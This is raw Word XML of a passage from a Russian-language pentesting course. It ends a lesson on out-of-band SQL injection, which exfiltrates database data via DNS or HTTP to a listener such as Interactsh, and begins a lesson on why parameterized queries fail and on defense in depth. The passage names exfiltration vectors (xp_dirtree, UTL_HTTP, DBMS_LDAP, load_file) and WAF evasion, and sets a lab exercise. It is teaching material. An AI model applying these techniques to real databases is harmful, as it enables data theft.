    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Применяя OOB через DNS, вы сокращаете количество запросов до одного на каждую запись. Более того, вы можете использовать функции кодирования, такие как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, прямо внутри SQL-запроса, чтобы избежать проблем со спецсимволами в DNS-именах. В одном из реальных аудитов это позволило извлечь конфигурационные данные из таблицы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sys.configurations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> за считанные секунды, в то время как классический «слепой» метод предсказывал время завершения через 40 минут.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Этот подход также эффективен против WAF, которые настроены на поиск паттернов типичных Blind-атак (длинные цепочки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>OR 1=1</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UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или специфические задержки). Запрос на обращение к сетевому пути часто выглядит для фильтров как легитимная бизнес-логика или менее приоритетная аномалия, особенно если вы используете нестандартные функции СУБД.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Практическое задание</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для закрепления материала воспользуйтесь локальным стендом с установленной MS SQL Server или Oracle DB. Ваша задача — настроить бесплатный экземпляр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Interactsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или аналогичный сервис) и выполнить следующие шаги:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Сформируйте запрос для извлечения версии СУБД (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>@@version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для MSSQL или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>select version from v$instance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для Oracle).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Оберните результат в функцию кодирования Base64 (или Hex), чтобы гарантировать валидность DNS-имени.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Сконструируйте финальную полезную нагрузку, инициирующую DNS-запрос к вашему субдомену.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Проверьте логи вашего слушателя и декодируйте полученное значение.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Попробуйте также реализовать атаку через HTTP-протокол (например, используя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UTL_HTTP.request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в Oracle), если сетевые настройки вашего стенда позволяют исходящие соединения на 80/443 порты. Сравните скрытность обоих методов в логах сервера.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Чек-лист ключевых идей</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>OOB-атаки используют СУБД как клиента для передачи данных на внешний сервер через DNS или HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Основное преимущество — скорость и стабильность в условиях нестабильного отклика сервера или жесткой фильтрации вывода.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>DNS-эксфильтрация наиболее эффективна для обхода межсетевых экранов благодаря доверию к трафику на 53 порт.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Основные векторы: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MSSQL), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UTL_HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>DBMS_LDAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Oracle), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>load_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MySQL на Windows).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Для успешной атаки необходимы права на выполнение сетевых функций и возможность исходящих соединений.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Использование специализированных слушателей (Interactsh, Burp Collaborator) критически упрощает эксплуатацию.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OOB-инъекции — это мощный инструмент, но они требуют понимания того, как СУБД взаимодействует с операционной системой и сетью. Однако иногда даже этого недостаточно, если уязвимость запрятана глубоко в логике приложения и не проявляется сразу. На следующем уроке мы разберем технику </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Second-Order SQLi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, где данные, внедренные сегодня, «взрываются» завтра, и научимся находить эти отложенные угрозы в сложных архитектурных решениях.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Урок 2.2 — Out-of-band (OOB) атаки через DNS и HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>~7 мин · теория · практика</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Иллюзия параметризации: почему классическая защита проваливается на уровне архитектуры</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>В среде разработчиков бытует опасное заблуждение: стоит обернуть все запросы в Prepared Statements, и проблема SQL-инъекций исчезнет навсегда. Однако для пентестера уровня Middle и выше параметризация — это лишь первый рубеж, который часто обходится через архитектурные лазейки, динамическую сортировку или специфические функции СУБД. Настоящая безопасность строится не на заплатках в коде, а на принципе эшелонированной защиты (Defense in Depth), где каждый слой системы — от прав пользователя в базе до структуры API — минимизирует поверхность атаки.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Представьте, что вы строите сейф. Параметризация — это надежный замок на двери. Но если стены сейфа сделаны из гипсокартона, грабителю не нужно возиться с замком. В роли таких «стен» выступают динамические имена таблиц, логика работы ORM-библиотек и права суперпользователя, под которыми приложение подключается к БД. Сегодня мы разберем, как выявлять эти структурные слабости при аудите и как проектировать системы, которые остаются устойчивыми, даже если злоумышленник нашел точку внедрения.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Анатомия уязвимого кода: PHP и Python в разрезе</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В аудите кода важно не просто искать отсутствие экранирования, а понимать контекст выполнения запроса. В PHP, несмотря на повсеместное использование PDO, разработчики часто спотыкаются на динамических компонентах запроса. Параметризация в PDO работает только для значений (VALUES, WHERE), но она бессильна, если имя таблицы или столбца передается через переменную. Рассмотрим классический паттерн: выборка для сортировки в админ-панели. Разработчик доверяет параметру </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>$_GET['sort']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, полагая, что раз он не находится в блоке WHERE, то опасности нет. Однако именно здесь открывается путь к Blind-инъекциям через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, где злоумышленник может использовать конструкции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для посимвольного перебора данных.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Python-разработчики, полагаясь на мощные ORM вроде SQLAlchemy или Django ORM, часто создают уязвимости, когда пытаются «оптимизировать» запросы через метод </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.extra()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или сырой SQL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>raw()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Типичная ошибка в Python — использование f-строк внутри функций выполнения запросов. Даже если библиотека поддерживает параметры, использование f-строки формирует окончательный запрос до того, как драйвер БД успеет его обработать. Это превращает высокоуровневый безопасный код в решето, где атакующий может встроить подзапрос прямо в середину бизнес-логики, обходя все встроенные фильтры ORM.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Архитектурный Defense in Depth на уровне СУБД</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Профессиональный подход к защите требует признания факта: код может быть скомпрометирован. Поэтому вторым эшелоном выступает конфигурация самой базы данных. Принцип наименьших привилегий (POLP) здесь должен выполняться фанатично. Если веб-приложение только читает статьи из блога, у его пользователя в БД не должно быть прав на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>DROP TABLE</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GRANT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
